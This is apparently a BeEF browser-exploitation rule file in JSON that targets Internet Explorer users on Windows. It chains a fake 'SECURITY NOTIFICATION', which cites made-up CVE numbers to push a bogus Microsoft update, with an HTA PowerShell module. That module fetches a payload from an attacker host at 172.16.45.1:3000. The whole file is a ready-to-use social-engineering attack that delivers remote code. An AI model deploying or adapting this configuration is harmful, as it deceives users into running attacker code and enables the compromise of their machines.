28 lines
742 B
JSON
28 lines
742 B
JSON
{
|
|
"name": "HTA PowerShell",
|
|
"author": "antisnatchor",
|
|
"browser": "IE",
|
|
"browser_version": "ALL",
|
|
"os": "Windows",
|
|
"os_version": ">= 7",
|
|
"modules": [
|
|
{
|
|
"name": "fake_notification",
|
|
"condition": null,
|
|
"options": {
|
|
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
|
|
}
|
|
},
|
|
{
|
|
"name": "hta_powershell",
|
|
"condition": null,
|
|
"options": {
|
|
"domain":"http://172.16.45.1:3000",
|
|
"ps_url":"/ps"
|
|
}
|
|
}],
|
|
"execution_order": [0,1],
|
|
"execution_delay": [0,500],
|
|
"chain_mode": "sequential"
|
|
}
|